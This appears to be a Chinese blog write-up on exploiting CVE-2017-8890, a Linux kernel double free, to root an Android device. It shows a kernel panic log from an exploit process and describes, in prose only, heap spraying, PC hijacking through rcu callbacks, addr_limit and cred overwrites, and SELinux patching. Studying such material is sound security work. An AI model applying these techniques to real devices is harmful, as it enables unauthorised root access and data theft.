[ 79.190743] 8700 00000000 0100007f 00000000 b1f30000 000a0002 00000000 00000000 00000000
[ 79.198851] 8720 11a237a0 ffffffc0 01df8088 ffffffc0 00000000 00000000 00000000 00000000
[ 79.206958] 8740 00000000 00000000 00000000 00000000 23f68050 ffffffc0 0235ecb8 ffffffc0
[ 79.215066] 8760 ffffffff 00000001 00120012 00000000 00000000 00000000 23f68778 ffffffc0
[ 79.223175] c0 5629 (exp)
[ 79.223175] X23: 0xffffffc001dee4c0:
[ 79.229383] e4c0 01df28b0 ffffffc0 00034000 00034000 00000800 00000000 00000000 00000000
[ 79.237491] e4e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.245598] e500 00000013 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.253706] e520 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.261813] e540 00000001 00000001 00020002 00000000 01def4c0 ffffffc0 01def4c0 ffffffc0
[ 79.269921] e560 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.278028] e580 01d3fe88 ffffffc0 f0000df1 00000000 00103b00 ffffffc0 00103b80 ffffffc0
[ 79.286136] e5a0 018e2650 ffffffc0 01d6b630 ffffffc0 00000000 00000001 00000002 00000000
[ 79.294245] c0 5629 (exp)
[ 79.294245] X24: 0xffffffc012a90890:
[ 79.300453] 0890 00000000 00000000 0c72f240 ffffffc0 00000000 00000000 00000000 00000000
[ 79.308561] 08b0 00000000 00000000 ffffffff ffffffff 00000000 00000000 15226dc0 ffffffc0
[ 79.316668] 08d0 08565000 ffffffc0 14cb6658 ffffffc0 14cb6658 ffffffc0 12a908e8 ffffffc0
[ 79.324776] 08f0 12a908e8 ffffffc0 249a8410 ffffffc0 00000000 00000000 011bf7a4 ffffffc0
[ 79.332883] 0910 0014a660 ffffffc0 20f59300 ffffffc0 247a67b0 ffffffc0 019b3180 ffffffc0
[ 79.340991] 0930 00000000 00000000 00000000 00000000 00000002 00000003 00000001 00000000
[ 79.349098] 0950 12a90950 ffffffc0 12a90950 ffffffc0 00000000 00000000 00000000 00000000
[ 79.357206] 0970 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.365316] c0 5629 (exp)
[ 79.365316] X27: 0xffffffc001d36f80:
[ 79.371523] 6f80 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.379631] 6fa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.387738] 6fc0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.395846] 6fe0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.403953] 7000 0120c860 ffffffc0 0120d150 ffffffc0 0120da00 ffffffc0 0120da40 ffffffc0
[ 79.412061] 7020 0120dc00 ffffffc0 011e4828 ffffffc0 011e491c ffffffc0 011e4a10 ffffffc0
[ 79.420168] 7040 011e4acc ffffffc0 011e4b68 ffffffc0 011e4c04 ffffffc0 011e4c80 ffffffc0
[ 79.428276] 7060 011e4d14 ffffffc0 011e4da8 ffffffc0 011e4e1c ffffffc0 011e4ee0 ffffffc0
[ 79.436385] c0 5629 (exp)
[ 79.436385] X28: 0xffffffc00c9ebf80:
[ 79.442593] bf80 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.450701] bfa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.458808] bfc0 00000000 00000000 00000000 00000000 f7651d10 00000000 20070010 00000000
[ 79.466916] bfe0 f52ce6c8 00000000 000000f0 00000000 60033308 fa8af01b f37b4620 4620fd95
[ 79.475023] c000 00000008 00000000 ffffffff ffffffff 225e1000 ffffffc0 01d3b800 ffffffc0
[ 79.483131] c020 010b4104 ffffffc0 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.491238] c040 00000000 00000000 00000000 00000000 00000002 00000000 57ac6e9d 00000000
[ 79.499346] c060 9200462b f2fe220a 490cfe8f 462b4632 70d0f507 f6c04479 9a0be99e 46386823
[ 79.507455] c0 5629 (exp)
[ 79.507455] X29: 0xffffffc00c9efcf0:
[ 79.513663] fcf0 23f68810 ffffffc0 00000000 00000000 23f68700 ffffffc0 01dee540 ffffffc0
[ 79.521771] fd10 12a90910 ffffffc0 00000116 00000000 00000039 00000000 01d37000 ffffffc0
[ 79.529878] fd30 0c9ec000 ffffffc0 0c9efd70 ffffffc0 017f8df8 ffffffc0 0c9efd70 ffffffc0
[ 79.537986] fd50 017f8da4 ffffffc0 80000145 00000000 00000000 00000000 00000020 00000000
[ 79.546093] fd70 0c9efdb0 ffffffc0 017f2c64 ffffffc0 23f68700 ffffffc0 247a6780 ffffffc0
[ 79.554201] fd90 00000000 00000000 20f59300 ffffffc0 0014a660 ffffffc0 017f2c30 ffffffc0
[ 79.562308] fdb0 0c9efde0 ffffffc0 01738bb8 ffffffc0 247a6780 ffffffc0 00000000 00000000
[ 79.570416] fdd0 247a67b0 ffffffc0 00000039 00000000 0c9efe00 ffffffc0 01738c50 ffffffc0
[ 79.578524] c0 5629 (exp)
[ 79.581199] c0 5629 (exp) Process exp (pid: 5629, stack limit = 0xffffffc00c9ec058)
[ 79.588790] c0 5629 (exp) Stack: (0xffffffc00c9efd70 to 0xffffffc00c9f0000)
[ 79.595691] c0 5629 (exp) fd60: 0c9efdb0 ffffffc0 017f2c64 ffffffc0
[ 79.605007] c0 5629 (exp) fd80: 23f68700 ffffffc0 247a6780 ffffffc0 00000000 00000000 20f59300 ffffffc0
[ 79.614322] c0 5629 (exp) fda0: 0014a660 ffffffc0 017f2c30 ffffffc0 0c9efde0 ffffffc0 01738bb8 ffffffc0
[ 79.623637] c0 5629 (exp) fdc0: 247a6780 ffffffc0 00000000 00000000 247a67b0 ffffffc0 00000039 00000000
[ 79.632952] c0 5629 (exp) fde0: 0c9efe00 ffffffc0 01738c50 ffffffc0 247a67b0 ffffffc0 00000008 00000000
[ 79.642267] c0 5629 (exp) fe00: 0c9efe20 ffffffc0 011bf5d8 ffffffc0 12a90900 ffffffc0 00000000 00000000
[ 79.651582] c0 5629 (exp) fe20: 0c9efe60 ffffffc0 011bf7c4 ffffffc0 12a90900 ffffffc0 00000000 00000000
[ 79.660897] c0 5629 (exp) fe40: 01e19000 ffffffc0 225e1000 ffffffc0 80000000 00000000 00000015 00000000
[ 79.670212] c0 5629 (exp) fe60: 0c9efe80 ffffffc0 010c171c ffffffc0 225e1a30 ffffffc0 01085844 ffffffc0
[ 79.679527] c0 5629 (exp) fe80: 0c9efeb0 ffffffc0 01089318 ffffffc0 00000004 00000000 0c9ec000 ffffffc0
[ 79.688842] c0 5629 (exp) fea0: ffffffff ffffffff 00405674 00000000 ceba7a20 0000007f 01084b14 ffffffc0
[ 79.698157] c0 5629 (exp) fec0: ceba8b33 0000007f 000007d0 00000000 00000000 00000000 ffffffbb 00000000
[ 79.707472] c0 5629 (exp) fee0: 00000002 00000000 0903c108 00000000 ceba79dc 0000007f 0903c000 00000000
[ 79.716787] c0 5629 (exp) ff00: 0903c6f0 00000000 00000000 00000000 00000039 00000000 fefefeff fefefefe
[ 79.726102] c0 5629 (exp) ff20: 7f7f7f7f 7f7f7f7f 01010101 01010101 00000000 00000000 00000000 00000000
[ 79.735417] c0 5629 (exp) ff40: 00000001 00000000 00001000 00000000 00000000 00000000 004a2000 00000000
[ 79.744732] c0 5629 (exp) ff60: 0049a000 00000000 ceba8b33 0000007f 000007d0 00000000 000007d0 00000000
[ 79.754047] c0 5629 (exp) ff80: 00406a58 00000000 004069a0 00000000 004001a0 00000000 00000000 00000000
[ 79.763361] c0 5629 (exp) ffa0: 00000000 00000000 00000000 00000000 00000000 00000000 ceba7a20 0000007f
[ 79.772677] c0 5629 (exp) ffc0: 00405664 00000000 ceba79e0 0000007f 00405674 00000000 80000000 00000000
[ 79.781992] c0 5629 (exp) ffe0: 00000003 00000000 00000039 00000000 f8a3a808 682323a6 699b4621 f8d54798
[ 79.791303] c0 5629 (exp) Call trace:
[ 79.794929] c0 5629 (exp) [<ffffffc0017f8da4>] ip_mc_drop_socket+0x40/0xb4
[ 79.801743] c0 5629 (exp) [<ffffffc0017f2c60>] inet_release+0x5c/0xb0
[ 79.808126] c0 5629 (exp) [<ffffffc001738bb4>] sock_release+0x2c/0xa8
[ 79.814507] c0 5629 (exp) [<ffffffc001738c4c>] sock_close+0x1c/0x30
[ 79.820719] c0 5629 (exp) [<ffffffc0011bf5d4>] __fput+0x90/0x20c
[ 79.826668] c0 5629 (exp) [<ffffffc0011bf7c0>] ____fput+0x1c/0x2c
[ 79.832707] c0 5629 (exp) [<ffffffc0010c1718>] task_work_run+0x9c/0xf4
[ 79.839176] c0 5629 (exp) [<ffffffc001089314>] do_notify_resume+0x5c/0x74
[ 79.845903] c0 5629 (exp) Code: d0002fb7 910442d4 911502f7 b4000313 (f9400261)
[ 79.867535] c0 5629 (exp) ---[ end trace 44c6c94b3e38ba9c ]---
[ 79.877625] c0 5629 (exp) Kernel panic - not syncing: Fatal exception
是否可以确认触发了?
在[原创] CVE-2017-8890 漏洞利用(root nexus6p@kernel 3.10)-Android安全-看雪论坛-安全社区|安全招聘|bbs.pediy.com [原创] CVE-2017-8890 漏洞利用(root nexus6p@kernel 3.10)中有说明:
而kernel panic在 ip_mc_drop_socket,PC位置也是ip_mc_drop_socket函数体内。
虽然接触LINUX这么久了,但并没有深入了解过LINUX 内核源代码,RCU机制没听过,所以现在不知道ip_mc_drop_socket上触发的是不是该漏洞。
暂且认为是的。
-
漏洞利用
-
没有任何保护措施时,控制EIP后,直接跳转到用户态的shellcode即可完成root提权。
-
有SMEP时,内核态不能执行用户态shellcode,可以通过内核rop结合shellcode来提权。
-
有SMAP时,内核态不能直接访问用户态数据,可以通过ret2dir把提权代码布置在内核态完成root提权。
在Android手机上利用时,由于Android中采取的linux内核版本相对较低,通常为3.10,但大多开启了PXN保护措施,内核态不能执行用户态shellcode。因此通过控制PC指针后修改addr_limit,用户态可以任意读写内核态。把double free转化成内核态任意地址的读写后,修改当前进程的cred结构体提权到root。之后patch selinux这个内核保护措施,可以完成提权操作到init权限(init权限比root权限更高)。
利用效果如下
POC的实现难度较低,造成的影响通常为DoS,会导致服务器重启、手机重启。
而提权root的难度较大,利用的实现过程比POC实现起来复杂很多,造成的危害也更大,可以导致服务器和手机上数据被普通程序或APP窃取。
[原创] CVE-2017-8890 漏洞利用(root nexus6p@kernel 3.10)
控制PC
控制PC的过程Jeremy的exploit已经完成了。利用的思路在Freebuf上云图信安的文章[1] (读者: 指 CVE-2017-8890漏洞分析与利用(Root Android 7.x) - FreeBuf网络安全行业门户 CVE-2017-8890漏洞分析与利用(Root Android 7.x) ?)已经详细分析过了。这里简单阐述一下,server端首先通过setsockopt 中的MCAST_JOIN_GROUP参数初始化一个带有vulnerable obj ip_mc_socklist的socket,设置server的 socket监听后,创建client线程connect两次,因此server端accept返回,在内核中将父socket复制,产生了两个带有vulnerable obj ip_mc_socklist的子socket。释放这两个socket时,ip_mc_socklist obj也会被释放两次。释放ip_mc_socklist obj的过程是在ip_mc_drop_socket中完成的,调用kfree_rcu注册回调函数,等待回调函数触发时来真正的释放这个obj。当rcu宽限期结束后,时钟中断触发时会调用rcu注册的回调函数。这时会kfree两次,造成double free。
注意:ip_mc_socklist obj 第二次free之前,由于kernel中的内存已经被释放了,正常不堆喷的情况下,可能会被其它的程序占位。在ip_mc_drop_socket中的ip_mc_leave_src中会对这个obj中的其它指针解引用,因此在ip_mc_leave_src中crash也是正常的。本质上crash的原因都是由于double free造成的。
了解了ip_mc_socklist obj 真正的释放过程后,就可以理解通过double free来控制PC的过程了。通常double free的利用有两种思路:一种是利用堆管理器的特性实现double free到代码执行,另一种就是通过占位把double free转化成UAF(读者:Use-After-Free)来使用。这里使用的是第二种。由于该漏洞的两次free的时机都是可控的,因此可以在第一次真正的kfree之后,通过堆喷射来占位释放的obj。通过构造占位的obj中的数据,控制ip_mc_socklist.rcu中的func(回调函数地址)即可劫持PC或控制next_rcu将ip_mc_socklist链中的next_rcu劫持到用户态再修改func指针来劫持PC。
利用思路二中直接控制func:之前在ubuntu上动态调试时,我尝试在ip_mc_drop_socket的kfree_rcu之前用gdb手工修改内存中的func几十次后,发现依然不能劫持PC,感觉对于回调函数保存和触发过程还是不熟悉。
利用思路二中劫持next_rcu:由于不存在SMAP或者是PAN,劫持next_rcu到用户态后,就可以为所欲为了。做一个循环不停地占位func,可以保证回调函数触发时,func是我们控制的值。
漏洞分析过程还可以参考之前的文章。
在Jeremy的exploit中,还用到了bind_on_cpu这个函数。一开始不明白这个函数的作用,将与之相关的调用删除后,有大概率会出现kernel page request error的log。
| 1 2 3 4 5 6 7 8 9 10 11 12 13 |
最低0.47元/天 解锁文章
937
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
